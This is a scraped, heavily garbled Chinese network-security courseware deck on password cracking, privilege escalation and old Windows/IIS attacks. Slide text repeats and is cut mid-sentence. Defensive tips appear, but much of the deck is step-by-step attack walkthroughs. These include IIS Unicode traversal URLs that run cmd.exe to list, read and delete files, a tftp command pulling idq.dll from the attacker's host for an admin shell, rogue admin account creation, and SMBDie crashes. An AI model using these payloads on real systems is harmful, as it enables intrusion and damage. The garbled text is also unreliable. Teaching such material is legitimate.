計(jì)算機(jī)網(wǎng)絡(luò)安全教程課件

1、計(jì)算機(jī)網(wǎng)絡(luò)安全教程課件計(jì)算機(jī)網(wǎng)絡(luò)安全教程課件社會(huì)工程學(xué)攻擊5.1社交工程是使用計(jì)謀和假情報(bào)去獲得密碼和其他敏感信息的科學(xué)，研究一個(gè)站點(diǎn)的策略其中之一就是盡可能多的了解這個(gè)組織的個(gè)體，因此黑客不斷試圖尋找更加精妙的方法從他們希望滲透的組織那里獲得信息。 牛牛文庫文檔分享社會(huì)工程學(xué)攻擊5.1社交工程是使用計(jì)謀和假情報(bào)去獲得密碼和其社會(huì)工程學(xué)攻擊舉個(gè)例子：一組高中學(xué)生曾經(jīng)想要進(jìn)入一個(gè)當(dāng)?shù)氐墓镜挠?jì)算機(jī)網(wǎng)絡(luò)，他們擬定了一個(gè)表格，調(diào)查看上去顯得是無害的個(gè)人信息，例如所有秘書和行政人員和他們的配偶、孩子的名字，這些從學(xué)生轉(zhuǎn)變成的黑客說這種簡單的調(diào)查是他們社會(huì)研究工作的一部分。利用這份表格這些學(xué)生能夠快速的

2、進(jìn)入系統(tǒng)，因?yàn)榫W(wǎng)絡(luò)上的大多數(shù)人是使用寵物和他們配偶名字作為密碼。 牛牛文庫文檔分享社會(huì)工程學(xué)攻擊舉個(gè)例子：一組高中學(xué)生曾經(jīng)想要進(jìn)入一個(gè)當(dāng)?shù)氐墓W(wǎng)絡(luò)攻擊技術(shù)社交工程黑客們最常用的一種攻擊手段能得到使用技術(shù)手段不能得到的好處防火墻和IDS對這種攻擊不起作用需要高超的人際交往技術(shù)常用方式電話電子商務(wù) 牛牛文庫文檔分享網(wǎng)絡(luò)攻擊技術(shù)社交工程黑客們最常用的一種攻擊手段www.ni網(wǎng)絡(luò)攻擊技術(shù)社交工程社交工程種類假冒權(quán)威假扮同情個(gè)人利益改善自我感覺不引人注意的職業(yè)獎(jiǎng)賞 牛牛文庫文檔分享網(wǎng)絡(luò)攻擊技術(shù)社交工程社交工程種類社交工程（Social Engineering）假冒權(quán)威黑客冒充公司的領(lǐng)導(dǎo)人員在大公司中，不

3、認(rèn)識(shí)所有上司的情況非常普通在Internet上，黑客可以通過郵件列表發(fā)出入侵的安全警告，并提供解決問題的指令，指令被設(shè)計(jì)成能使黑客訪問系統(tǒng)。足夠顯眼的標(biāo)題和時(shí)髦的行話 牛牛文庫文檔分享社交工程（Social Engineering）假冒權(quán)威ww社交工程（Social Engineering）假扮電話、電子郵件、聊天室和短消息里假扮你的熟人如果你是新來的職員，冒充你的同事同情如果一個(gè)人打電話來，講述他的困難，你不幫助他嗎？個(gè)人利益假冒來自財(cái)務(wù)部門的員工，訪問系統(tǒng)管理員 牛牛文庫文檔分享社交工程（Social Engineering）假扮www.社交工程（續(xù)）改善自我感覺自我感覺良好的人易于被欺騙

4、黑客進(jìn)入熱情的經(jīng)理房間，表明自己是來自市場部的新員工，會(huì)得到詳細(xì)的介紹 牛牛文庫文檔分享社交工程（續(xù)）改善自我感覺 牛牛文社交工程（續(xù)）不引人注意的職業(yè)來自天然氣、電力公司或者電話公司的員工請求撥號等上機(jī)操作人們會(huì)單獨(dú)把黑客放在房間里獎(jiǎng)賞提供某種形式的獎(jiǎng)賞會(huì)引誘人泄露信息口令比賽贏大獎(jiǎng)、展示創(chuàng)造性，請列出密碼 牛牛文庫文檔分享社交工程（續(xù)）不引人注意的職業(yè) 牛避免受到社交工程攻擊極度警惕Do not trust any stranger即使是很友好的人懷疑一切聲稱并不代表他有權(quán)這樣做詢問他們的權(quán)限絕大多數(shù)社交工程在高度警惕下破產(chǎn) 牛牛文庫文檔分享避免受到社交工程攻擊極度警惕 牛牛避免受到社交工

5、程攻擊（續(xù)）驗(yàn)證出處當(dāng)某人電子郵件要求時(shí)，要求來電話確證對于電話里的請求，要求回電號碼并確證員工號碼或者身份證 牛牛文庫文檔分享避免受到社交工程攻擊（續(xù)）驗(yàn)證出處避免受到社交工程攻擊（續(xù)）說不對于逾越日常行為準(zhǔn)則的要求，要拒絕要求按照正常程序和規(guī)定書面報(bào)告和授權(quán)信息用戶培訓(xùn)培訓(xùn)員工，提高安全意識(shí) 牛牛文庫文檔分享避免受到社交工程攻擊（續(xù)）說不 牛物理攻擊與防范5.2 獲取管理員密碼1權(quán)限提升2 牛牛文庫文檔分享物理攻擊與防范5.2 獲取管理員密碼1權(quán)限提升2www.n物理安全是保護(hù)一些比較重要的設(shè)備不被接觸。物理安全比較難防，因?yàn)楣敉鶃碜阅軌蚪佑|到物理設(shè)備的用戶。 引 言 牛牛文庫文檔分享

6、物理安全是保護(hù)一些比較重要的設(shè)備不被接觸。引 言www.ni獲取管理員密碼1用戶登錄以后，所有的用戶信息都存儲(chǔ)在系統(tǒng)的一個(gè)進(jìn)程中，這個(gè)進(jìn)程是：“winlogon.exe”，Windows Logon Process，Windows NT 用戶登陸程序，管理用戶登錄和退出。該進(jìn)程的正常路徑應(yīng)是 C:WindowsSystem32 且是以 SYSTEM 用戶運(yùn)行 牛牛文庫文檔分享獲取管理員密碼1用戶登錄以后，所有的用戶信息都存儲(chǔ)在系統(tǒng)的一獲取管理員密碼1案例5-1得到管理員密碼用戶登錄以后，所有的用戶信息都存儲(chǔ)在系統(tǒng)的一個(gè)進(jìn)程中，這個(gè)進(jìn)程是：“winlogon.exe”，可以利用程序?qū)?dāng)前登錄用戶

7、的密碼解碼出來，如圖5-1所示。 牛牛文庫文檔分享獲取管理員密碼1案例5-1得到管理員密碼www.niuwk.獲取管理員密碼1使用FindPass等工具可以對該進(jìn)程進(jìn)行解碼，然后將當(dāng)前用戶的密碼顯示出來。將FindPass.exe拷貝到C盤根目錄，執(zhí)行該程序，將得到當(dāng)前用戶得登錄名，如圖5-2所示。 牛牛文庫文檔分享獲取管理員密碼1使用FindPass等工具可以對該進(jìn)程進(jìn)行解權(quán)限提升2有時(shí)候，管理員為了安全，給其他用戶建立一個(gè)普通用戶帳號，認(rèn)為這樣就安全了。常用的方法： 社會(huì)工程學(xué) 本地溢出 利用scripts目錄的可執(zhí)行權(quán)限 替換系統(tǒng)服務(wù) 替換admin常用程序 利用autorun .inf

8、 Serv-U提升權(quán)限 SQL帳戶密碼泄露 牛牛文庫文檔分享權(quán)限提升2有時(shí)候，管理員為了安全，給其他用戶建立一個(gè)普通用戶權(quán)限提升2用普通用戶帳號登錄后，可以利用工具GetAdmin.exe將自己加到管理員組或者新建一個(gè)具有管理員權(quán)限的用戶。 牛牛文庫文檔分享權(quán)限提升2用普通用戶帳號登錄后，可以利用工具GetAdmin案例5-2 普通用戶建立管理員帳號利用Hacker帳戶登錄系統(tǒng)，在系統(tǒng)中執(zhí)行程序GetAdmin.exe，程序自動(dòng)讀取所有用戶列表，在對話框中點(diǎn)擊按鈕“New”，在框中輸入要新建的管理員組的用戶名，如圖5-5所示。 牛牛文庫文檔分享案例5-2 普通用戶建立管理員帳號利用Hacker

9、帳戶登錄系案例5-2 普通用戶建立管理員帳號輸入一個(gè)用戶名“IAMHacker”，點(diǎn)擊按鈕“確定”以后，然后點(diǎn)擊主窗口的按鈕“OK”，出現(xiàn)添加成功的窗口，如圖5-6所示。 牛牛文庫文檔分享案例5-2 普通用戶建立管理員帳號輸入一個(gè)用戶名“IAMHa暴力攻擊5.3 字典文件1暴力破解操作系統(tǒng)密碼2 暴力破解郵箱密碼3暴力破解軟件密碼4 牛牛文庫文檔分享暴力攻擊5.3 字典文件1暴力破解操作系統(tǒng)密碼2 暴力破暴力攻擊是一種發(fā)現(xiàn)密碼的嘗試，其方法是系統(tǒng)地嘗試字母、數(shù)字和符號的每種可能組合，直到發(fā)現(xiàn)一個(gè)可起作用的正確組合。攻擊者總可以通過暴力攻擊獲得密碼，但這種方法的不利之處在于，可能需要數(shù)年才能找到

10、一個(gè)密碼。根據(jù)密碼的長度和復(fù)雜性，也許有無數(shù)個(gè)可能的組合。針對一個(gè)安全系統(tǒng)進(jìn)行暴力攻擊需要大量的時(shí)間，需要極大的意志和決心。什么是暴力攻擊 牛牛文庫文檔分享暴力攻擊是一種發(fā)現(xiàn)密碼的嘗試，其方法是系統(tǒng)地嘗試字母、數(shù)字和暴力攻擊暴力攻擊的一個(gè)具體例子是，一個(gè)黑客試圖使用計(jì)算機(jī)和信息去破解一個(gè)密碼。一個(gè)黑客需要破解段單一的被用非對稱密鑰加密的信息，為了破解這種算法，一個(gè)黑客需要求助于非常精密復(fù)雜的方法，它使用120個(gè)工作站，兩個(gè)超級計(jì)算機(jī)利用從三個(gè)主要的研究中心獲得的信息，即使擁有這種配備，它也將花掉八天的時(shí)間去破解加密算法，實(shí)際上破解加密過程八天已是非常短暫的時(shí)間了。 牛牛文庫文檔分享暴力攻擊暴力

11、攻擊的一個(gè)具體例子是，一個(gè)黑客試圖使用計(jì)算機(jī)和信暴力破解兩種方式的破解在線破解在線登錄目標(biāo)主機(jī)，通過程序循環(huán)輸入密碼嘗試正確的密碼輸入可能會(huì)在日志里留下記錄，很容易被探測出來離線破解取得目標(biāo)主機(jī)的密碼文件，然后在本地破解花費(fèi)時(shí)間較長，一般時(shí)攻擊系統(tǒng)取得一定權(quán)限后使用 牛牛文庫文檔分享暴力破解兩種方式的破解 牛牛文庫文在線破解Windows系統(tǒng)使用NAT(NetBIOS Auditing Tool)進(jìn)行探測在NetBIOS開放138，139端口提供SMB服務(wù)，允許用戶遠(yuǎn)程訪問文件系統(tǒng)Windows2000缺省共享所有驅(qū)動(dòng)器和admin$訪問文件系統(tǒng)時(shí)需要用戶身份驗(yàn)證NAT可以猜測用戶口令，從而取

12、得目標(biāo)機(jī)器的控制權(quán)NAT用法：nat -o filename -u userlist -p passlist address 牛牛文庫文檔分享在線破解Windows系統(tǒng) 牛牛文在線破解Linux系統(tǒng)一般在telnet三次錯(cuò)誤后，系統(tǒng)會(huì)斷開連接在線破解的軟件較少 牛牛文庫文檔分享在線破解Linux系統(tǒng) 牛牛文庫文離線破解得到用戶的密碼文件，然后在本地破解Windows系統(tǒng)用戶密碼存放在%systemroot%system32config和%systemroot%repair中得到這個(gè)文件后可以使用L0phtcrack進(jìn)行本地破解 牛牛文庫文檔分享離線破解得到用戶的密碼文件，然后在本地破解www.

13、niuwk離線破解Linux系統(tǒng)用戶名和密碼存儲(chǔ)在/etc/passwd中會(huì)被很多用戶看到該文件為了加強(qiáng)安全性，將密碼存儲(chǔ)在etc/shadow中只能由root存取著名的破解工具：John the Ripper因?yàn)長inux在線破解困難，所以離線破解比較常見很多管理員現(xiàn)在沒有使用shadow文件 牛牛文庫文檔分享離線破解Linux系統(tǒng) 牛牛文庫文暴力破解手段暴力破解的手段字典攻擊強(qiáng)行攻擊組合攻擊 牛牛文庫文檔分享暴力破解手段暴力破解的手段 牛牛文字典攻擊字典：一些單詞或者字母和數(shù)字的組合使用字典的好處比較快速的得到用戶密碼，只需要在字典中進(jìn)行查找 牛牛文庫文檔分享字典攻擊字典：一些單詞或者字母

14、和數(shù)字的組合www.niuwk字典攻擊前提前提條件絕大多數(shù)用戶選擇密碼總是有一定規(guī)律的姓名：自己、父母、愛人、孩子生日電話號碼，身份證號碼，學(xué)號英文單詞上述組合打開錢包，我就能知道你的密碼設(shè)計(jì)一個(gè)好的字典是非常有必要的 牛牛文庫文檔分享字典攻擊前提前提條件 牛牛文庫文檔字典攻擊防御防止字典攻擊的方法使用帶有特殊字符的密碼密碼不是有規(guī)律的英語單詞 牛牛文庫文檔分享字典攻擊防御防止字典攻擊的方法 牛強(qiáng)行攻擊在選定的字母或者數(shù)字序列里生成所有包含這些字母的口令密碼生成器，只要用戶指定字母和數(shù)字和密碼的位數(shù)，就能生成字典特點(diǎn)密碼較多，所需時(shí)間較長分布式攻擊多臺(tái)計(jì)算機(jī)共同運(yùn)算適用于對用戶信息不夠了解的情

15、況 牛牛文庫文檔分享強(qiáng)行攻擊在選定的字母或者數(shù)字序列里生成所有包含這些字母的口令強(qiáng)行攻擊防御對策使用長的密碼攻擊者需要構(gòu)造出很大的字典，加大攻擊難度經(jīng)常更換密碼需要在方便和安全中作出抉擇 牛牛文庫文檔分享強(qiáng)行攻擊防御對策 牛牛文庫文檔分享組合攻擊綜合前兩種攻擊的優(yōu)點(diǎn)字典攻擊：速度較快強(qiáng)行攻擊：發(fā)現(xiàn)所有的口令根據(jù)掌握的用戶的不同信息，進(jìn)行口令組合姓名縮寫和生日的組合在字母組合后面加上一些數(shù)字 攻擊速度破解口令數(shù)量 字典攻擊 快 所有字典單詞強(qiáng)行攻擊慢所有口令組合攻擊中等以字典為基礎(chǔ)的單詞 牛牛文庫文檔分享組合攻擊綜合前兩種攻擊的優(yōu)點(diǎn) 攻擊速度破解口令數(shù)量 三種攻擊的比較 攻擊速度破解口令數(shù)量 字

16、典攻擊 快 所有字典單詞強(qiáng)行攻擊慢所有口令組合攻擊中等以字典為基礎(chǔ)的單詞 牛牛文庫文檔分享三種攻擊的比較 攻擊速度破解口令數(shù)量 字典攻擊 字典文件1一次字典攻擊能否成功，很大因素上決定與字典文件。一個(gè)好的字典文件可以高效快速的得到系統(tǒng)的密碼。攻擊不同的公司、不通地域的計(jì)算機(jī)，可以根據(jù)公司管理員的姓氏以及家人的生日，可以作為字典文件的一部分，公司以及部門的簡稱一般也可以作為字典文件的一部分，這樣可以大大的提高破解效率。 牛牛文庫文檔分享字典文件1一次字典攻擊能否成功，很大因素上決定與字典文件。一字典文件1一個(gè)字典文件本身就是一個(gè)標(biāo)準(zhǔn)的文本文件，其中的每一行就代表一個(gè)可能的密碼。目前有很多工具軟件

17、專門來創(chuàng)建字典文件，圖5-8是一個(gè)簡單的字典文件。 牛牛文庫文檔分享字典文件1一個(gè)字典文件本身就是一個(gè)標(biāo)準(zhǔn)的文本文件，其中的每一暴力破解操作系統(tǒng)密碼2字典文件為暴力破解提供了一條捷徑，程序首先通過掃描得到系統(tǒng)的用戶，然后利用字典中每一個(gè)密碼來登錄系統(tǒng)，看是否成功，如果成功則將密碼顯示 牛牛文庫文檔分享暴力破解操作系統(tǒng)密碼2字典文件為暴力破解提供了一條捷徑，程序暴力破解操作系統(tǒng)密碼2案例5-3 暴力破解操作系統(tǒng)密碼 比如使用圖5-8所示的字典文件，利用上一章介紹的工具軟件GetNTUser依然可以將管理員密碼破解出來，如圖5-9所示。 牛牛文庫文檔分享暴力破解操作系統(tǒng)密碼2案例5-3 暴力破解操

18、作系統(tǒng)密碼 ww暴力破解郵箱密碼3郵箱的密碼一般需要設(shè)置到八位以上，否則七位以下的密碼容易被破解。尤其七位全部是數(shù)字，更容易被破解。案例5-4 電子郵箱暴力破解 破解電子郵箱密碼，一個(gè)比較著名的工具軟件是：黑雨P(guān)OP3郵箱密碼暴力破解器，比較穩(wěn)定的版本是2.3.1，主界面如圖5-10所示。 牛牛文庫文檔分享暴力破解郵箱密碼3郵箱的密碼一般需要設(shè)置到八位以上，否則七位暴力破解軟件密碼4目前許多軟件都具有加密的功能，比如Office文檔、Winzip文檔和Winrar文檔等等。這些文檔密碼可以有效的防止文檔被他人使用和閱讀。但是如果密碼位數(shù)不夠長的話，同樣容易被破解。案例5-5 Office文檔暴

19、力破解 牛牛文庫文檔分享暴力破解軟件密碼4目前許多軟件都具有加密的功能，比如Offi修改權(quán)限密碼在對話框中選擇選項(xiàng)卡“安全性”，在打開權(quán)限密碼和修改權(quán)限密碼的兩個(gè)文本框中都輸入“999”，如圖5-12所示。 牛牛文庫文檔分享修改權(quán)限密碼在對話框中選擇選項(xiàng)卡“安全性”，在打開權(quán)限密碼和輸入密碼保存并關(guān)閉該文檔，然后再打開，就需要輸入密碼了，如圖5-13所示。 牛牛文庫文檔分享輸入密碼保存并關(guān)閉該文檔，然后再打開，就需要輸入密碼了，如圖破解Word文檔密碼該密碼是三位的，使用工具軟件，Advanced Office XP Password Recovery可以快速破解Word文檔密碼，主界面如圖5

20、-14所示。 牛牛文庫文檔分享破解Word文檔密碼該密碼是三位的，使用工具軟件，Advan破解Word文檔密碼點(diǎn)擊工具欄按鈕“Open File”，打開剛才建立的Word文檔，程序打開成功后會(huì)在Log Window中顯示成功打開的消息，如圖5-15所示。 牛牛文庫文檔分享破解Word文檔密碼點(diǎn)擊工具欄按鈕“Open File”，打破解Word文檔密碼設(shè)置密碼長度最短是一位，最長是三位，點(diǎn)擊工具欄開始的圖標(biāo)，開始破解密碼，大約兩秒鐘后，密碼被破解了，如圖5-16所示。 牛牛文庫文檔分享破解Word文檔密碼設(shè)置密碼長度最短是一位，最長是三位，點(diǎn)擊Unicode漏洞專題5.4 Unicode漏洞的檢

21、測方法1使用Unicode漏洞刪除主頁2 牛牛文庫文檔分享Unicode漏洞專題5.4 Unicode漏洞的檢測方法1引言通過打操作系統(tǒng)的補(bǔ)丁程序，就可以消除漏洞。只要是針對漏洞進(jìn)行攻擊的案例都依賴于操作系統(tǒng)是否打了相關(guān)的補(bǔ)丁。Unicode漏洞是2000-10-17發(fā)布的，受影響的版本：Microsoft IIS 5.0+Microsoft Windows 2000系列版本Microsoft IIS 4.0+ Microsoft Windows NT 4.0消除該漏洞的方式是安裝操作系統(tǒng)的補(bǔ)丁，只要安裝了SP1以后，該漏洞就不存在了。微軟IIS 4.0和5.0都存在利用擴(kuò)展UNICODE字符

22、取代/和而能利用./目錄遍歷的漏洞。 牛牛文庫文檔分享引言通過打操作系統(tǒng)的補(bǔ)丁程序，就可以消除漏洞。只要是針對漏洞Unicode漏洞Unicode漏洞是2000-10-17發(fā)布的，受影響的版本：Microsoft IIS 5.0+Microsoft Windows 2000系列版本Microsoft IIS 4.0+ Microsoft Windows NT 4.0消除該漏洞的方式是安裝操作系統(tǒng)的補(bǔ)丁，只要安裝了SP1以后，該漏洞就不存在了。微軟IIS 4.0和5.0都存在利用擴(kuò)展UNICODE字符取代/和而能利用./目錄遍歷的漏洞。 牛牛文庫文檔分享Unicode漏洞Unicode漏洞是20

23、00-10-17發(fā)Unicode漏洞的檢測方法1使用掃描工具來檢測Unicode漏洞是否存在，使用上一章介紹的X-Scan來對目標(biāo)系統(tǒng)進(jìn)行掃描，目標(biāo)主機(jī)IP為：09，Unicode漏洞屬于IIS漏洞，所以這里只掃描IIS漏洞就可以了，X-Scan設(shè)置如圖5-17所示。 牛牛文庫文檔分享Unicode漏洞的檢測方法1使用掃描工具來檢測UnicodUnicode漏洞的檢測方法1將主機(jī)添加到目標(biāo)地址，掃描結(jié)果如圖5-18所示。 牛牛文庫文檔分享Unicode漏洞的檢測方法1將主機(jī)添加到目標(biāo)地址，掃描結(jié)果Unicode漏洞的檢測方法1可以看出，存在許多系統(tǒng)的漏洞。只要是/scripts開頭的漏洞都是U

24、nicode漏洞。比如：/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir其中/scripts目錄是IIS提供的可以執(zhí)行命令的一個(gè)有執(zhí)行程序權(quán)限的一個(gè)目錄，在IIS中的位置如圖5-19所示。 牛牛文庫文檔分享Unicode漏洞的檢測方法1可以看出，存在許多系統(tǒng)的漏洞。Unicode漏洞的檢測方法1scripts目錄一般系統(tǒng)盤根目錄下的Inetpub目錄下，如圖5-20所示。 牛牛文庫文檔分享Unicode漏洞的檢測方法1scripts目錄一般系統(tǒng)盤根Unicode漏洞的檢測方法1在Windows的目錄結(jié)構(gòu)中，可以使用兩個(gè)點(diǎn)和一個(gè)斜線“./”來訪問上一

25、級目錄，在瀏覽器中利用“scripts/././”可以訪問到系統(tǒng)盤根目錄，訪問“scripts/././winnt/system32”就訪問到系統(tǒng)的系統(tǒng)目錄了，在system32目錄下包含許多重要的系統(tǒng)文件，比如cmd.exe文件，可以利用該文件新建用戶，刪除文件等操作。 牛牛文庫文檔分享Unicode漏洞的檢測方法1在Windows的目錄結(jié)構(gòu)中，Unicode漏洞的檢測方法1瀏覽器地址欄中禁用符號“./”，但是可以使用符號“/”的Unicode的編碼。比如 “/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Uni

26、code編碼。這條語句是執(zhí)行dir命令列出目錄結(jié)構(gòu)。 牛牛文庫文檔分享Unicode漏洞的檢測方法1瀏覽器地址欄中禁用符號“./Unicode漏洞此漏洞從中文IIS4.0+SP6開始，還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，臺(tái)灣繁體中文也同樣存在這樣的漏洞。在NT4中/編碼為“%c1%9c”或者“%c1%9c”，WIN2000英文版是“%c0%af”。 牛牛文庫文檔分享Unicode漏洞此漏洞從中文IIS4.0+SP6開始，還影Unicode漏洞但從國外某些站點(diǎn)得來的資料顯示，還有以下的編碼可以實(shí)現(xiàn)對該漏洞的檢測，該編碼存在于日文版、韓文版等操作系統(tǒng)。

27、%c1%pc%c0%9v%c0%qf%c1%8s%e0%80%af 牛牛文庫文檔分享Unicode漏洞但從國外某些站點(diǎn)得來的資料顯示，還有以下的Unicode漏洞利用該漏洞讀取出計(jì)算機(jī)上目錄列表，比如讀取C盤的目錄，只要在瀏覽器中輸入“09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:” 牛牛文庫文檔分享Unicode漏洞利用該漏洞讀取出計(jì)算機(jī)上目錄列表，比如讀取利用Unicode漏洞讀取系統(tǒng)盤目錄 牛牛文庫文檔分享利用Unicode漏洞讀取系統(tǒng)盤目錄www.niuwk.co利用Unicode漏洞讀取系統(tǒng)盤目錄利用語句得到對方計(jì)算機(jī)上裝了幾

28、個(gè)操作系統(tǒng)以及操作系統(tǒng)的類型，只要讀取C盤下的boot.ini文件就可以了。使用的語句是：09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.ini執(zhí)行的結(jié)果如圖5-22所示。 牛牛文庫文檔分享利用Unicode漏洞讀取系統(tǒng)盤目錄利用語句得到對方計(jì)算機(jī)上使用Unicode漏洞刪除主2利用Unicode可以方便的更改對方的主頁，比如現(xiàn)在已經(jīng)知道對方網(wǎng)站的根路徑在“C:Initpubwwwroot”（系統(tǒng)默認(rèn)）下，可以刪除該路徑下的文件“default.asp”來刪除主頁，這里的“default.asp”文件是IIS的默認(rèn)啟動(dòng)頁面。使

29、用的語句是：09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asp 牛牛文庫文檔分享使用Unicode漏洞刪除主2利用Unicode可以方便的更使用Unicode漏洞刪除主2 牛牛文庫文檔分享使用Unicode漏洞刪除主2 ?？截愇募榱耸鞘褂梅奖悖谜Z句將cmd.exe文件拷貝到scripts目錄，并改名為c.exe，使用的語句是：09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exe程序

30、執(zhí)行結(jié)果如圖5-24所示。 牛牛文庫文檔分享拷貝文件為了是使用方便，利用語句將cmd.exe文件拷貝到s查看C盤的目錄以后使用cmd.exe命令就方便了，比如查看C盤的目錄，使用的語句就可以簡化為：09/scripts/c.exe?/c+dir+c:執(zhí)行的結(jié)果如圖5-25所示。 牛牛文庫文檔分享查看C盤的目錄以后使用cmd.exe命令就方便了，比如查看C利用Unicode漏洞入侵系統(tǒng)在地址欄上執(zhí)行命令，用戶的權(quán)限比較低，像net等系統(tǒng)管理指令不能執(zhí)行。利用Unicode可以入侵對方的系統(tǒng)，并得到管理員權(quán)限。首先需要向?qū)Ψ椒?wù)器上傳一些文件。入侵的第一步，建立tftp服務(wù)器，向?qū)Ψ降膕cript

31、s文件夾傳幾個(gè)文件。 牛牛文庫文檔分享利用Unicode漏洞入侵系統(tǒng)在地址欄上執(zhí)行命令，用戶的權(quán)限利用Unicode漏洞入侵系統(tǒng)需要上傳一個(gè)名為“idq.dll”的文件，為了上傳這個(gè)文件，首先在本地計(jì)算機(jī)上搭建一個(gè)TFTP服務(wù)器，普通文件傳輸協(xié)議TFTP（Text File Transmission Protocol）一般用來傳輸單個(gè)文件。使用工具軟件tftpd32.exe建立服務(wù)器。將idq.dll和tftpd32.exe放在本地的同一目錄下，執(zhí)行tftpd32.exe程序，主界面如圖5-26所示。 牛牛文庫文檔分享利用Unicode漏洞入侵系統(tǒng)需要上傳一個(gè)名為“idq.dl利用Unicod

32、e漏洞入侵系統(tǒng)這樣在本地的TFTP的服務(wù)器就建立好了，保留這個(gè)窗口，通過該服務(wù)器向?qū)Ψ絺鬟fidq.dll文件。在瀏覽器中執(zhí)行命令：“09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”，命令其實(shí)是“tftp i 10 get idq.dll”意思是從10服務(wù)器上獲取idq.dll文件，執(zhí)行成功的界面如圖5-27所示。 牛牛文庫文檔分享利用Unicode漏洞入侵系統(tǒng)這樣在本地的TFTP的服務(wù)器就上載文件 牛牛文庫文檔分享上載文件 牛牛文庫文檔分享查看scripts目錄上傳完畢后可以查看一下scripts目錄，是

33、否真的上傳成功了。如圖5-28所示。 牛牛文庫文檔分享查看scripts目錄上傳完畢后可以查看一下scripts目入侵對方主機(jī) 說明已經(jīng)成功的在scripts目錄中上傳了一個(gè)idq.dll文件，第二步：下面使用工具軟件ispc.exe入侵對方系統(tǒng)拷貝ispc.exe文件到本地計(jì)算機(jī)的C盤根目錄，在DOS命令行下執(zhí)行命令：“ispc.exe 09/scripts/idq.dll”，連接成功后就直接進(jìn)入了對方的DOS命令行下，而且具有管理員權(quán)限，入侵的過程5-29所示。 牛牛文庫文檔分享入侵對方主機(jī) 說明已經(jīng)成功的在scripts目錄中上傳了一個(gè)建立用戶 可以在對方計(jì)算機(jī)上做管理員可以做的一切事情

34、，比如添加用戶，建立一個(gè)用戶名為“Hacker123”，密碼也是“Hacker123”的用戶，如圖5-30所示。 牛牛文庫文檔分享建立用戶 可以在對方計(jì)算機(jī)上做管理員可以做的一切事情，比如添其他漏洞攻擊5.5 利用打印漏洞1SMB致命攻擊2 牛牛文庫文檔分享其他漏洞攻擊5.5 利用打印漏洞1SMB致命攻擊2www.n 利用打印漏洞利用打印漏洞可以在目標(biāo)的計(jì)算機(jī)上添加一個(gè)具有管理員權(quán)限的用戶。經(jīng)過測試，該漏洞在SP2、SP3以及SP4版本上依然存在，但是不能保證100%入侵成功。 使用工具軟件：cniis.exe，使用的語法格式是：“cniis 09 0”，第一個(gè)參數(shù)是目標(biāo)的IP地址，第二參數(shù)是

35、目標(biāo)操作系統(tǒng)的補(bǔ)丁號，因?yàn)?9沒有打補(bǔ)丁，這里就是0?？截恈niis.exe文件到C盤根目錄，執(zhí)行程序如圖5-31所示。1 牛牛文庫文檔分享 利用打印漏洞利用打印漏洞可以在目標(biāo)的計(jì)算機(jī)上添加一個(gè)具有管SMB致命攻擊SMB（Session Message Block，會(huì)話消息塊協(xié)議）又叫做NetBIOS或LanManager協(xié)議，用于不同計(jì)算機(jī)之間文件、打印機(jī)、串口和通訊的共享和用于Windows平臺(tái)上提供磁盤和打印機(jī)的共享。SMB協(xié)議版本有很多種，在Windows 98、Windows NT、Windows 2000和XP使用的是NTLM 0.12版本。2 牛牛文庫文檔分享SMB致命攻擊SMB

36、（Session Message BloSMB致命攻擊利用該協(xié)議可以進(jìn)行各方面的攻擊，比如可以抓取其他用戶訪問自己計(jì)算機(jī)共享目錄的SMB會(huì)話包，然后利用SMB會(huì)話包登錄對方的計(jì)算機(jī)。下面介紹利用SMB協(xié)議讓對方操作系統(tǒng)系統(tǒng)重新啟動(dòng)或者藍(lán)屏。2 牛牛文庫文檔分享SMB致命攻擊利用該協(xié)議可以進(jìn)行各方面的攻擊，比如可以抓取其致命攻擊使用的工具軟件是：SMBDie V1.0，該軟件對打了SP3、SP4的計(jì)算機(jī)依然有效，必須打?qū)ｉT的SMB補(bǔ)丁，軟件的主界面如圖5-32所示。 牛牛文庫文檔分享致命攻擊使用的工具軟件是：SMBDie V1.0，該軟件對打致命攻擊攻擊的時(shí)候，需要兩個(gè)參數(shù)：對方的IP地址和對方

37、的機(jī)器名，窗口中分別輸入這兩項(xiàng)，如圖5-33所示。 牛牛文庫文檔分享致命攻擊攻擊的時(shí)候，需要兩個(gè)參數(shù)：對方的IP地址和對方的機(jī)器致命攻擊然后再點(diǎn)按鈕“Kill”，如果參數(shù)輸入沒有錯(cuò)誤的話，對方計(jì)算機(jī)立刻重啟或藍(lán)屏，命中率幾乎100%，被攻擊的計(jì)算機(jī)藍(lán)屏界面如圖5-34所示。 牛牛文庫文檔分享致命攻擊然后再點(diǎn)按鈕“Kill”，如果參數(shù)輸入沒有錯(cuò)誤的話，緩沖區(qū)溢出攻擊5.6 RPC漏洞溢出1利用IIS溢出進(jìn)行攻擊2 利用WebDav遠(yuǎn)程溢出 3 牛牛文庫文檔分享緩沖區(qū)溢出攻擊5.6 RPC漏洞溢出1利用IIS溢出進(jìn)行攻引言目前最流行的一種攻擊技術(shù)就是緩沖區(qū)溢出攻擊。當(dāng)目標(biāo)操作系統(tǒng)收到了超過了它的最

38、大能接收的信息量的時(shí)候，將發(fā)生緩沖區(qū)溢出。這些多余的數(shù)據(jù)將使程序的緩沖區(qū)溢出，然后覆蓋了實(shí)際的程序數(shù)據(jù)，緩沖區(qū)溢出使目標(biāo)系統(tǒng)的程序被修改，經(jīng)過這種修改的結(jié)果使在系統(tǒng)上產(chǎn)生一個(gè)后門。這項(xiàng)攻擊對技術(shù)要求比較高，但是攻擊的過程卻非常簡單。緩沖區(qū)溢出原理很簡單，比如程序： 牛牛文庫文檔分享引言目前最流行的一種攻擊技術(shù)就是緩沖區(qū)溢出攻擊。當(dāng)目標(biāo)操作系引言void function(char * szPara1)char buff16;strcpy(buffer, szPara1);程序中利用strcpy函數(shù)將szPara1中的內(nèi)容拷貝到buff中，只要szPara1的長度大于16，就會(huì)造成緩沖區(qū)溢出。存

